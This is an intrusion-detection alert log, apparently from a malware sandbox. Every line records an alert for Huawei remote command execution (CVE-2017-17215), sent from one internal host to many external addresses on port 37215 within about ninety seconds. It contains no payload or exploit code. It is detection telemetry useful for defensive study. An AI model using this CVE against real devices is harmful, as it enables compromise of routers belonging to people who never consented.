                                                    07/10/24-08:27:08.375858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5913637215192.168.2.1441.38.16.165
                                                    07/10/24-08:26:23.300149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5200637215192.168.2.1441.189.163.137
                                                    07/10/24-08:26:41.569815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3667637215192.168.2.14169.116.1.158
                                                    07/10/24-08:27:28.082325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4419237215192.168.2.14197.57.168.190
                                                    07/10/24-08:26:59.623766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4794637215192.168.2.14197.187.202.26
                                                    07/10/24-08:27:23.900911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5699037215192.168.2.14157.22.91.221
                                                    07/10/24-08:26:28.845573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4564837215192.168.2.1441.134.119.175
                                                    07/10/24-08:27:30.562058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4878437215192.168.2.14197.175.225.33
                                                    07/10/24-08:27:02.736564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4417037215192.168.2.14157.60.28.52
                                                    07/10/24-08:26:25.522257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5408837215192.168.2.14157.183.221.176
                                                    07/10/24-08:26:55.403312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5237237215192.168.2.14178.250.211.24
                                                    07/10/24-08:26:41.335427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4646637215192.168.2.141.39.91.217
                                                    07/10/24-08:27:32.484037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4280437215192.168.2.14197.157.111.239
                                                    07/10/24-08:26:47.835000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5399437215192.168.2.14157.101.151.241
                                                    07/10/24-08:26:20.175593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414837215192.168.2.14197.79.121.48
                                                    07/10/24-08:26:28.822867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5980437215192.168.2.14197.105.214.162
                                                    07/10/24-08:26:41.556012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3670037215192.168.2.14157.206.40.45
                                                    07/10/24-08:26:36.382964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4309237215192.168.2.1441.25.204.103
                                                    07/10/24-08:27:23.948745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4464237215192.168.2.14197.95.144.193
                                                    07/10/24-08:27:23.912574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5672037215192.168.2.14157.16.169.183
                                                    07/10/24-08:26:14.740635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5518437215192.168.2.14190.127.112.232
                                                    07/10/24-08:26:38.569394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5542437215192.168.2.14157.200.235.205
                                                    07/10/24-08:26:47.746309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4674437215192.168.2.1441.134.225.243
                                                    07/10/24-08:26:59.529956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3937237215192.168.2.14126.121.253.114
                                                    07/10/24-08:26:59.646425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4541437215192.168.2.14157.180.55.60
                                                    07/10/24-08:27:22.810148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4876637215192.168.2.14197.160.117.206
                                                    07/10/24-08:27:31.553494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3864637215192.168.2.14153.171.207.192
                                                    07/10/24-08:27:28.064051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5695637215192.168.2.14223.14.31.84
                                                    07/10/24-08:26:31.072676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3329837215192.168.2.14197.104.146.110
                                                    07/10/24-08:26:33.252785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4324437215192.168.2.1441.89.33.206
                                                    07/10/24-08:26:29.874680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5964637215192.168.2.14157.253.51.236
                                                    07/10/24-08:26:13.743815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5352637215192.168.2.14157.161.249.250
                                                    07/10/24-08:26:57.649894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4061437215192.168.2.14157.2.255.81
                                                    07/10/24-08:26:31.062553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5805437215192.168.2.14157.85.50.82
                                                    07/10/24-08:27:03.019463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5883437215192.168.2.14197.61.164.74
                                                    07/10/24-08:26:41.493980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4191837215192.168.2.14156.220.189.16
                                                    07/10/24-08:26:13.770173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4558037215192.168.2.14157.174.22.21
                                                    07/10/24-08:26:41.513250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5158237215192.168.2.14157.23.70.75
                                                    07/10/24-08:27:02.836233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5006437215192.168.2.14157.195.133.242
                                                    07/10/24-08:27:02.908970TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5859837215192.168.2.1441.214.245.2
                                                    07/10/24-08:26:23.360287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4436037215192.168.2.14197.99.68.93
                                                    07/10/24-08:27:07.396195TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3486437215192.168.2.1441.168.112.84
                                                    07/10/24-08:27:08.297921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5753237215192.168.2.14197.123.164.222
                                                    07/10/24-08:27:19.327774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3871437215192.168.2.14146.150.108.146
                                                    07/10/24-08:26:41.375849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3512837215192.168.2.14131.139.230.173
                                                    07/10/24-08:26:55.453359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4515237215192.168.2.14157.60.160.3
                                                    07/10/24-08:26:43.656959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4674437215192.168.2.14197.159.136.166
                                                    07/10/24-08:26:38.554862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5794437215192.168.2.14203.116.135.27
                                                    07/10/24-08:26:59.716127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5637437215192.168.2.14107.175.229.225
                                                    07/10/24-08:27:27.081335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5932237215192.168.2.144.171.148.185
                                                    07/10/24-08:27:13.955612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3888837215192.168.2.14197.201.232.177
                                                    07/10/24-08:26:29.810736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4808837215192.168.2.14157.190.163.13
                                                    07/10/24-08:26:49.813021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5931637215192.168.2.14182.133.217.207
                                                    07/10/24-08:26:42.432411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4924437215192.168.2.1457.212.248.158
                                                    07/10/24-08:27:22.799861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4320037215192.168.2.14157.59.115.163
                                                    07/10/24-08:27:24.912875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3891037215192.168.2.1468.38.139.244
                                                    07/10/24-08:26:38.575243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5934437215192.168.2.14197.7.139.66
                                                    07/10/24-08:26:59.783807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4720037215192.168.2.14213.140.42.173
                                                    07/10/24-08:26:25.429135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3511437215192.168.2.14119.24.201.252
                                                    07/10/24-08:26:25.469425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5925437215192.168.2.14197.125.77.89
                                                    07/10/24-08:26:43.696289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5238037215192.168.2.14197.121.213.172
                                                    07/10/24-08:27:02.973887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4970437215192.168.2.1441.225.21.106
                                                    07/10/24-08:26:11.434490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3354037215192.168.2.14157.19.87.80
                                                    07/10/24-08:26:51.973962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4420637215192.168.2.1441.224.122.55
                                                    07/10/24-08:26:36.392999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3767037215192.168.2.14197.37.217.100
                                                    07/10/24-08:26:13.672822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5009237215192.168.2.14197.228.49.100
                                                    07/10/24-08:26:28.907657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5321037215192.168.2.14197.87.71.231
                                                    07/10/24-08:26:45.651958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5895437215192.168.2.1444.208.154.193
                                                    07/10/24-08:27:23.853234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3919037215192.168.2.14197.160.238.83
                                                    07/10/24-08:26:20.183913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3814237215192.168.2.1440.207.130.207
                                                    07/10/24-08:26:38.596849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3402437215192.168.2.1441.170.158.140
                                                    07/10/24-08:27:14.882178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5398237215192.168.2.14197.196.12.35
                                                    07/10/24-08:27:33.901645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3685037215192.168.2.1441.255.247.55
                                                    07/10/24-08:27:31.558138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4994237215192.168.2.14157.34.143.227
                                                    07/10/24-08:27:08.417840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4749837215192.168.2.14114.253.21.135
                                                    07/10/24-08:27:13.887400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5215037215192.168.2.1441.244.74.159
                                                    07/10/24-08:26:17.989369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5812037215192.168.2.14144.143.25.173
                                                    07/10/24-08:27:13.869693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3562037215192.168.2.1467.121.186.62
                                                    07/10/24-08:27:02.883243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3476837215192.168.2.1434.62.28.205
                                                    07/10/24-08:26:23.294371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6024237215192.168.2.1418.0.145.160
                                                    07/10/24-08:26:29.746967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5683237215192.168.2.14197.125.213.29
                                                    07/10/24-08:26:31.061341TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3535637215192.168.2.14157.112.27.133
                                                    07/10/24-08:26:55.412005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3297037215192.168.2.14197.45.114.172
                                                    07/10/24-08:27:13.905026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4652837215192.168.2.14197.95.196.246
                                                    07/10/24-08:26:45.652788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4337637215192.168.2.14157.103.171.102
                                                    07/10/24-08:26:59.607972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5660637215192.168.2.14157.92.243.158
                                                    07/10/24-08:27:19.234449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4791037215192.168.2.1441.253.218.163
                                                    07/10/24-08:26:53.207305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3631637215192.168.2.14140.74.132.175
                                                    07/10/24-08:26:45.640181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5252037215192.168.2.14157.192.111.28
                                                    07/10/24-08:27:07.369832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4963037215192.168.2.14197.164.218.187
                                                    07/10/24-08:27:28.035789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3927637215192.168.2.14157.249.114.163
                                                    07/10/24-08:26:22.281648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5422037215192.168.2.1441.247.134.230
                                                    07/10/24-08:27:22.896369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5481037215192.168.2.14197.239.113.81
                                                    07/10/24-08:27:28.171262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3966237215192.168.2.14157.95.7.216
                                                    07/10/24-08:27:32.607136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4052037215192.168.2.14157.44.150.170
                                                    07/10/24-08:26:49.824367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5968837215192.168.2.14197.79.24.23
                                                    07/10/24-08:26:22.281423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3889437215192.168.2.144.245.209.31
                                                    07/10/24-08:26:57.517659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4157037215192.168.2.1441.49.63.103
                                                    07/10/24-08:27:24.975422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5852237215192.168.2.1441.192.43.110
                                                    07/10/24-08:26:57.633994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4738037215192.168.2.14197.104.183.188
                                                    07/10/24-08:26:34.207710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3671837215192.168.2.1491.64.238.63
                                                    07/10/24-08:27:05.092511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3859837215192.168.2.14133.176.62.234
                                                    07/10/24-08:26:45.598670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4116237215192.168.2.1441.64.207.240
                                                    07/10/24-08:26:22.295536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5084637215192.168.2.14197.243.254.13
                                                    07/10/24-08:27:22.835160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5240037215192.168.2.14197.142.69.84
                                                    07/10/24-08:27:31.448470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4087237215192.168.2.1441.162.169.56
                                                    07/10/24-08:27:23.781687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4338637215192.168.2.14157.214.176.90
                                                    07/10/24-08:27:27.164992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3630637215192.168.2.1462.41.68.15
                                                    07/10/24-08:26:42.410235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5787437215192.168.2.1492.11.97.167
                                                    07/10/24-08:26:43.695962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4499237215192.168.2.1441.16.213.221
                                                    07/10/24-08:26:59.669841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3345837215192.168.2.1441.104.215.28
                                                    07/10/24-08:26:15.863531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4510437215192.168.2.14157.255.107.113
                                                    07/10/24-08:27:02.706461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3757637215192.168.2.14197.198.56.212
                                                    07/10/24-08:26:57.505906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3735837215192.168.2.14197.106.212.56
                                                    07/10/24-08:27:20.518150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3384637215192.168.2.1471.65.243.62
                                                    07/10/24-08:26:45.610191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5689037215192.168.2.14193.114.196.194
                                                    07/10/24-08:27:11.562285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5611437215192.168.2.14185.90.194.139
                                                    07/10/24-08:27:02.834804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5200837215192.168.2.1441.178.231.165
                                                    07/10/24-08:27:24.954167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3760037215192.168.2.1437.214.248.146
                                                    07/10/24-08:26:38.619683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4289837215192.168.2.14197.39.66.13
                                                    07/10/24-08:26:33.173734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3995237215192.168.2.14157.129.185.82
                                                    07/10/24-08:26:59.628167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3538437215192.168.2.14116.97.44.96
                                                    07/10/24-08:27:13.914013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4362037215192.168.2.1441.186.50.189
                                                    07/10/24-08:26:31.102674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5457637215192.168.2.1441.124.171.113
                                                    07/10/24-08:27:30.487311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3871237215192.168.2.1470.170.246.233
                                                    07/10/24-08:26:17.927872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5746837215192.168.2.14185.74.123.112
                                                    07/10/24-08:27:17.033866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4325237215192.168.2.14197.0.61.61
                                                    07/10/24-08:26:26.564107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4044237215192.168.2.14197.125.223.14
                                                    07/10/24-08:26:28.789365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4514837215192.168.2.14146.6.160.127
                                                    07/10/24-08:26:33.225771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5854437215192.168.2.14157.5.250.176
                                                    07/10/24-08:27:11.564208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5083437215192.168.2.1441.142.172.62
                                                    07/10/24-08:26:41.408660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4213637215192.168.2.14197.217.159.0
                                                    07/10/24-08:27:13.998912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4655837215192.168.2.1441.63.63.121
                                                    07/10/24-08:26:25.469425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4039237215192.168.2.14197.46.97.34
                                                    07/10/24-08:27:30.534474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6086037215192.168.2.1441.4.34.24
                                                    07/10/24-08:26:28.716778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4753837215192.168.2.14197.227.104.207
                                                    07/10/24-08:26:23.340650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4268437215192.168.2.14157.249.227.157
                                                    07/10/24-08:27:07.333954TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4906837215192.168.2.14157.208.53.226
                                                    07/10/24-08:26:28.840870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3321437215192.168.2.14197.121.155.236
                                                    07/10/24-08:26:28.911510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4319237215192.168.2.14157.59.45.245
                                                    07/10/24-08:27:31.463838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4623637215192.168.2.14157.85.5.68
                                                    07/10/24-08:26:57.631103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6043237215192.168.2.14217.152.98.140
                                                    07/10/24-08:27:28.155677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5819237215192.168.2.1441.186.141.116
                                                    07/10/24-08:26:26.619862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5731637215192.168.2.1441.239.103.250
                                                    07/10/24-08:27:30.466887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5514037215192.168.2.1450.224.90.219
                                                    07/10/24-08:26:28.832747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5075837215192.168.2.14197.25.237.90
                                                    07/10/24-08:26:33.245667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3501037215192.168.2.14157.186.96.128
                                                    07/10/24-08:26:23.357682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5112637215192.168.2.14152.189.222.20
                                                    07/10/24-08:26:41.285291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3374037215192.168.2.14157.65.101.14
                                                    07/10/24-08:26:31.051778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4452237215192.168.2.1481.220.66.6
                                                    07/10/24-08:27:17.025929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5364637215192.168.2.14157.104.229.41
                                                    07/10/24-08:26:55.295464TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3624437215192.168.2.1441.243.13.148
                                                    07/10/24-08:27:07.372864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3613837215192.168.2.14157.246.84.15
                                                    07/10/24-08:26:55.405669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3873237215192.168.2.1431.191.202.15
                                                    07/10/24-08:27:05.189899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5270837215192.168.2.1441.58.22.227
                                                    07/10/24-08:27:19.239107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5590037215192.168.2.14145.240.69.57
                                                    07/10/24-08:27:32.597902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5102437215192.168.2.14157.219.171.44
                                                    07/10/24-08:26:28.763475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5140637215192.168.2.14197.211.24.39
                                                    07/10/24-08:26:49.748241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3863837215192.168.2.14117.91.133.182
                                                    07/10/24-08:27:31.468333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3709637215192.168.2.14157.134.210.17
                                                    07/10/24-08:27:19.196013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4622237215192.168.2.14203.191.81.179
                                                    07/10/24-08:27:33.908493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5914437215192.168.2.1441.200.75.36
                                                    07/10/24-08:26:57.667245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5201637215192.168.2.1441.19.216.73
                                                    07/10/24-08:27:11.494437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5442837215192.168.2.1447.112.139.106
                                                    07/10/24-08:26:38.543702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4537437215192.168.2.14197.204.238.183
                                                    07/10/24-08:27:02.904364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5412637215192.168.2.14166.24.55.248
                                                    07/10/24-08:26:59.640605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4336637215192.168.2.14157.198.110.107
                                                    07/10/24-08:27:34.132992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3374437215192.168.2.14157.141.128.99
                                                    07/10/24-08:26:41.325591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4218437215192.168.2.1434.185.242.6
                                                    07/10/24-08:26:42.392755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3932637215192.168.2.14157.156.95.209
                                                    07/10/24-08:26:59.607971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4926837215192.168.2.14197.190.228.100
                                                    07/10/24-08:27:32.490587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4261837215192.168.2.14157.250.216.3
                                                    07/10/24-08:27:20.507849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5269237215192.168.2.14197.176.160.7
                                                    07/10/24-08:26:33.189218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3367437215192.168.2.14197.58.184.78
                                                    07/10/24-08:26:14.771626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4786237215192.168.2.14197.35.19.57
                                                    07/10/24-08:27:27.174460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3631037215192.168.2.14197.150.57.49
                                                    07/10/24-08:26:41.554449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6063437215192.168.2.14157.168.138.133
                                                    07/10/24-08:26:52.008729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3513637215192.168.2.14157.158.27.39
                                                    07/10/24-08:26:47.994856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4514237215192.168.2.14196.125.115.8
                                                    07/10/24-08:26:13.819532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3383437215192.168.2.1441.68.218.83
                                                    07/10/24-08:26:45.623992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4481037215192.168.2.14197.43.16.237
                                                    07/10/24-08:26:14.755062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4885237215192.168.2.1441.187.86.244
                                                    07/10/24-08:26:49.824955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3936237215192.168.2.14202.234.44.208
                                                    07/10/24-08:26:59.585766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5429837215192.168.2.14117.60.26.228
                                                    07/10/24-08:26:34.238567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3606837215192.168.2.14157.124.145.175
                                                    07/10/24-08:26:41.429574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4886237215192.168.2.14157.119.212.184
                                                    07/10/24-08:27:19.271475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5239837215192.168.2.145.169.108.149
